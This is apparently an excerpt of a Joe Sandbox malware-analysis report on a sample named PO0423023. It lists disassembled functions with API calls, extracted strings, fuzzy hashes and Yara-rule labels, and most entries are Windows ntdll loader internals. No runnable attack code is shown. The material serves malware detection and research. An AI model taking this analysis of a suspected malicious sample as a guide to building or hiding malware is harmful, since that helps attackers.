threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(43PI9J,00000111,00000000,00000000), ref: 00413D5A

Strings

43PI9J, xrefs: 00413D4F, 00413D59, 00413D6A
43PI9J, xrefs: 00413D61, 00413D64

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 43PI9J$43PI9J
API String ID: 1836367815-3851319958
Opcode ID: fffb23aa9ddeec823dd08e1460c8f20b97aa54604dcf6e9f19ad6e241deb67da
Instruction ID: 0d4bbac67b8e8c6ad1a3cb857ff09ffba9d902fb1b1648c0fa7842eed38bfedf
Opcode Fuzzy Hash: fffb23aa9ddeec823dd08e1460c8f20b97aa54604dcf6e9f19ad6e241deb67da
Instruction Fuzzy Hash: 1D01C8B2E4011C7ADB10AAE5AC81DEF7B7CDF41654F40806AFA1477141D5785F068BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042B5C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B602

Strings

^dA, xrefs: 0042B5C6

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: ^dA
API String ID: 3298025750-2569602317
Opcode ID: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction ID: cc69992b692840691eaf312d0b561dcd8a78b1c9b6df208bb0cec81a566c1689
Opcode Fuzzy Hash: ce93246a69b5882d972c797c91ef939338ce0b38d4dc1d1bd946b2f8b8ac8e45
Instruction Fuzzy Hash: 1CE06D72604204BBDA10EE99DC41F9B73ACEFC8710F004419FA18A7241C670B9118BB8

Uniqueness

Uniqueness Score: -1.00%

Function 004176A6 Relevance: 1.6, APIs: 1, Instructions: 52
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction ID: 7dd7ab4ae67f949c9cfc49ab85b4ba0194ea636ff2e7520346db56672388e54d
Opcode Fuzzy Hash: cc3708b30da9a9f570cb99fb9619e6857d31c12d8698441e88361e2a3f940741
Instruction Fuzzy Hash: 7601D6B5E0420AAFDB00CBA0DC42FDEBB74AF10318F00419AED0896281F675EB55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0042B573 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DEEB,?,?,00000000,?,0041DEEB,?,?,?), ref: 0042B5AF

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction ID: 8d392c0aacc9dab507deb327bea9887e63f69da25420374837b9a169aefa09fb
Opcode Fuzzy Hash: 46cb4fcd68c3a19337677cea21a617a2ec9c797abe1f236d3b92ff980b16336e
Instruction Fuzzy Hash: A5E06DB1600204BBC610EE99DC45FAB77ACEFC4710F000019FA18A7282D6B4B910CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B613 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,39F972C8,?,?,39F972C8), ref: 0042B647

Memory Dump Source

Source File: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_PO0423023.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1b567072b6604096ac706f461aa3c31240a5062b12ed542193b806810540eed6
Instruction ID: 0f89bd69e690552b6dca5b6b651433203c3ac265cde3a2836dffe4fefecae6be
Opcode Fuzzy Hash: 1b567072b6604096ac706f461aa3c31240a5062b12ed542193b806810540eed6
Instruction Fuzzy Hash: 36E08635640214BBD620FA5ADC41F9B775DDFC5714F40441AFB0CA7182C6B579018BF4

Uniqueness

Uniqueness Score: -1.00%

Function 01A02C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A02C24

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6ed88fd8685236942a352d4f654261eac4a3a74ee4915d384a11aa7885bfeec
Instruction ID: 73836d67cb56048d052a7b918ce909f0157fab202904641d4b7d10109320ed03
Opcode Fuzzy Hash: a6ed88fd8685236942a352d4f654261eac4a3a74ee4915d384a11aa7885bfeec
Instruction Fuzzy Hash: 39B09B729415C5C6DA12E764560C717790077D1741F16C076D2030685F873CC5D1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01A42349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 01A42B74
ExecuteOptions, xrefs: 01A425A0
GlobalFlag2, xrefs: 01A42FC0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01A43176
DisableHeapLookaside, xrefs: 01A4246D
ShutdownFlags, xrefs: 01A424A1
@, xrefs: 01A42942
GlobalFlag, xrefs: 01A42F3F, 01A43059
UnloadEventTraceDepth, xrefs: 01A424C0
FrontEndHeapDebugOptions, xrefs: 01A42489
DisableExceptionChainValidation, xrefs: 01A4275F
MinimumStackCommitInBytes, xrefs: 01A42BB0
LdrpInitializeExecutionOptions, xrefs: 01A4317D
RaiseExceptionOnPossibleDeadlock, xrefs: 01A42579
MaxLoaderThreads, xrefs: 01A424EC
UseImpersonatedDeviceMap, xrefs: 01A4251C
TracingFlags, xrefs: 01A42549
CFGOptions, xrefs: 01A42967
minkernel\ntdll\ldrinit.c, xrefs: 01A43187
MaxDeadActivationContexts, xrefs: 01A42D82

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: bcb84e11420f8440e3fb10691a5e7408bef4756b9e8cb2bc36948a2156c4aa52
Instruction ID: b64f41a8d92f1ea5856ae266012b00a4d989ede241e4412f521ec2bbd7817853
Opcode Fuzzy Hash: bcb84e11420f8440e3fb10691a5e7408bef4756b9e8cb2bc36948a2156c4aa52
Instruction Fuzzy Hash: 42927D71604742ABE721DF29D880B6BBBE8BFC4754F04492EFA98D7251D770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 01A35543
Address of the debug info found in the active list., xrefs: 01A354AE, 01A354FA
Critical section address, xrefs: 01A35425, 01A354BC, 01A35534
Thread identifier, xrefs: 01A3553A
double initialized or corrupted critical section, xrefs: 01A35508
8, xrefs: 01A352E3
corrupted critical section, xrefs: 01A354C2
undeleted critical section in freed memory, xrefs: 01A3542B
Invalid debug info address of this critical section, xrefs: 01A354B6
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354E2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A3540A, 01A35496, 01A35519
Critical section debug info address, xrefs: 01A3541F, 01A3552E
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354CE
Critical section address., xrefs: 01A35502

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: e2d11023c162b62ea0776ac9cad5023aea702ca9b671a9b55eefd4c83112cfdf
Instruction ID: 688fd17f129f5799e35cd85bafd9afe0c5e26eea55a6013a55372c5b9ba6f67d
Opcode Fuzzy Hash: e2d11023c162b62ea0776ac9cad5023aea702ca9b671a9b55eefd4c83112cfdf
Instruction Fuzzy Hash: B1819CB0E40348AFDB20CF99C845BAEBBF9BB88B15F544119F508B7281D775A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A32506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A32409
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A32602
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A32624
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A322E4
RtlpResolveAssemblyStorageMapEntry, xrefs: 01A3261F
@, xrefs: 01A3259B
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A32498
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A325EB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A324C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A32412

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: f3a23a3b8103b2551ccb9e788edf35d186966a84ac52bf0589a80c53d8e7b074
Instruction ID: 2345c77c5c87ea8bb34158519f3cf55298016c0f9f1e70431a698f64e9a4d9e3
Opcode Fuzzy Hash: f3a23a3b8103b2551ccb9e788edf35d186966a84ac52bf0589a80c53d8e7b074
Instruction Fuzzy Hash: DC0260B1D00229AFDB21DB54CD80B99B7B8AF94704F4041EAA74DA7241DB31AF84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 01A68B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

svchost.exe, xrefs: 01A68B68
csrss.exe, xrefs: 01A68B80
DefaultBrowser_NOPUBLISHERID, xrefs: 01A68D00
runtimebroker.exe, xrefs: 01A68B73
SegmentHeap, xrefs: 01A68BE9
services.exe, xrefs: 01A68B96
heapType, xrefs: 01A68BCB
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01A68BD0
lsass.exe, xrefs: 01A68BA1
smss.exe, xrefs: 01A68B8B

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: e712e2147275c7e8ad259c7cf15981d2122ffce32547162b251c7854f2aca940
Instruction ID: 05158d8af8d4fb6823b2097af688cbfcbe60bda60e15c1e33ac98642bb71b1ca
Opcode Fuzzy Hash: e712e2147275c7e8ad259c7cf15981d2122ffce32547162b251c7854f2aca940
Instruction Fuzzy Hash: 4051E1715143019FC729DF598884BABBBECFF98340F14091DEA99C7284E778D508CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01A70274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A704D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A706EA
RtlReAllocateHeap, xrefs: 01A702BF, 01A70362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A7069F
Just reallocated block at %p to %Ix bytes, xrefs: 01A705F1
HEAP: , xrefs: 01A703A6, 01A704B5, 01A705DD, 01A70682, 01A706D9
About to reallocate block at %p to %Ix bytes, xrefs: 01A703BA
HEAP[%wZ]: , xrefs: 01A70399, 01A704A8, 01A705D0, 01A70675, 01A706CC

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 51278f8268b1fd9aceda0ae735d3e9c24517ff2f1fb08c4e66b32b3256e2cc5c
Instruction ID: 89198bedde5a0f615b793aabfc062058a14a07bad7ac3522cf8e64f98ffcaadc
Opcode Fuzzy Hash: 51278f8268b1fd9aceda0ae735d3e9c24517ff2f1fb08c4e66b32b3256e2cc5c
Instruction Fuzzy Hash: 9ED1F435500685DFDB22DF69CA90AAEFBF1FF8A714F088059F54A9B252C734DA81CB14

Uniqueness

Uniqueness Score: -1.00%

Function 01A489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A48A3D
VerifierDlls, xrefs: 01A48CBD
AVRF: -*- final list of providers -*- , xrefs: 01A48B8F
HandleTraces, xrefs: 01A48C8F
VerifierDebug, xrefs: 01A48CA5
VerifierFlags, xrefs: 01A48C50
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A48A67

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: e17a4a95f3861c928942ab165518311b0b0ecf9620a6dce40cf4867ba0ace3fd
Instruction ID: 0184d8bc376cd22d6ddd905045fb4e594554b6f366e8e1c80947446865a1862c
Opcode Fuzzy Hash: e17a4a95f3861c928942ab165518311b0b0ecf9620a6dce40cf4867ba0ace3fd
Instruction Fuzzy Hash: BA912771A46342AFD722DFA8E8C0B6B77E8BBD4714F09041CFA496B252C778AC05C795

Uniqueness

Uniqueness Score: -1.00%

Function 019CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Exit, xrefs: 019CEB6C
, xrefs: 019CF299
R, xrefs: 019CEB62
LdrpResSearchResourceInsideDirectory Enter, xrefs: 019CEB58
T, xrefs: 019CEB4E
{, xrefs: 01A24643

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 0d76c67937ff19b3385bb9713df6cd885a228cfbd082d2fb77d209f0fd1f9327
Instruction ID: 2317c5a6cb15eb3e2f75c2d0c088bc592f76f178e857cd073dd0b97b08670730
Opcode Fuzzy Hash: 0d76c67937ff19b3385bb9713df6cd885a228cfbd082d2fb77d209f0fd1f9327
Instruction Fuzzy Hash: EFA24974A0562A8FDB64CF19CD88BA9BBB5BF89704F1442EDD94DA7251DB309E80CF01

Uniqueness

Uniqueness Score: -1.00%

Function 019F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01A3413A
_LdrpInitialize, xrefs: 01A340DF, 01A34141, 01A34205, 01A3425F
minkernel\ntdll\ldrinit.c, xrefs: 01A340E9, 01A3414B, 01A3420F, 01A34269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01A341FE
Delaying execution failed with status 0x%08lx, xrefs: 01A34258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01A340D8

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: ef79dca4781939699b72073d84a3c432d03478da68d8e8a27ef384f01fdf5fbe
Instruction ID: 174b5f7e24e6eb1986d9cd5f29cead2cf17e191407b93532338a0d3b8825abea
Opcode Fuzzy Hash: ef79dca4781939699b72073d84a3c432d03478da68d8e8a27ef384f01fdf5fbe
Instruction Fuzzy Hash: 42914930F00751ABEB35EF58D984BAA7BA5BFC5B24F04012DFA087B292D7749842C790

Uniqueness

Uniqueness Score: -1.00%

Function 019B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A19A01
apphelp.dll, xrefs: 019B6496
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A19A2A
LdrpInitShimEngine, xrefs: 01A199F4, 01A19A07, 01A19A30
minkernel\ntdll\ldrinit.c, xrefs: 01A19A11, 01A19A3A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A199ED

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: f63dbbb22f69c349f0dd5ba25be87d14153568cedadcc202ec7e0ad25f1f44fa
Instruction ID: 284ab111577d2438ff7247b369dc17e5b155d5a8597ccb9b4894d1233f238b93
Opcode Fuzzy Hash: f63dbbb22f69c349f0dd5ba25be87d14153568cedadcc202ec7e0ad25f1f44fa
Instruction Fuzzy Hash: 3051D0726083049FE720DF24D991FAB77E8FFC4648F44091DF689971A5D630E949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 01A38170
minkernel\ntdll\ldrredirect.c, xrefs: 01A38181, 01A381F5
LdrpInitializeImportRedirection, xrefs: 01A38177, 01A381EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 01A381E5
LdrpInitializeProcess, xrefs: 019FC6C4
minkernel\ntdll\ldrinit.c, xrefs: 019FC6C3

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 5d313f492ea56606982e0f94b0d615554bd0f39f8979cef6944f718134c443c2
Instruction ID: 83acdef09fc5046844493527902c1fb025169db64a696715f35bf2a6f23b2b6a
Opcode Fuzzy Hash: 5d313f492ea56606982e0f94b0d615554bd0f39f8979cef6944f718134c443c2
Instruction Fuzzy Hash: A7310771748346AFC224EF68DD46E2AB7D4FFD4B10F04051CF9886B291D620ED05C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 019F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01A32165
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A3219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A32178
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A321BF
RtlGetAssemblyStorageRoot, xrefs: 01A32160, 01A3219A, 01A321BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A32180

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
Instruction ID: 7537a82a8e131cad78672f7e74f2294a54b8d3dd5dd4ed9adf742d8944018fbc
Opcode Fuzzy Hash: 57f9e2368cf5f72ecec46df63d4cde83588a3a8b78151282f6406af84baef4e4
Instruction Fuzzy Hash: FA31C436B413257BE7219B9A8D82F6A7A78DBE5A50F05405EFB08A7240D270EE00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 01A0096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01A02DF0: LdrInitializeThunk.NTDLL ref: 01A02DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A00D74

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
Instruction ID: db3a4559c10a9ebeebf455f9517d55dfa66de6f5dc11ee3e399df6094bbeb9c4
Opcode Fuzzy Hash: 610695840dfd13e3c01f076459ff11508a2563a38d24598d81baa8dc13328128
Instruction Fuzzy Hash: 12427D71900705DFDB62CF28C980BAAB7F4FF44314F1445AAE989EB281D770AA85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 019CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 019CA3E7
LdrResFallbackLangList Exit, xrefs: 019CA3FF
LdrResFallbackLangList Enter, xrefs: 019CA3EF
6, xrefs: 019CA3F7

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
Instruction ID: 20205a103b5c0069b51e32b7d90af523722215402ddd40cfba7d4d7a59dd23dd
Opcode Fuzzy Hash: 5f4213737beb19907425def169131bb7d07df1b3f4e7ddd5446f0d5ea3aa1552
Instruction Fuzzy Hash: FDC17B7420838A8FD711CF58C544B6AB7E4BF94B04F04896EF9DA8B291E734CA49CB57

Uniqueness

Uniqueness Score: -1.00%

Function 019F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 019F8422
@, xrefs: 019F8591
minkernel\ntdll\ldrinit.c, xrefs: 019F8421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019F855E

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
Instruction ID: ed92cff31b89cc0467932bd0e709511f1b17b014bf5ab90d5ab15856e4038679
Opcode Fuzzy Hash: dec65d88095baff68f5be4cc909d8bf04d51ac8c60f230b22ee782849beb534d
Instruction Fuzzy Hash: 6D917C71548345BFEB22EF65CD44FABBAECBF84754F40092EFA8892151E334D9048B62

Uniqueness

Uniqueness Score: -1.00%

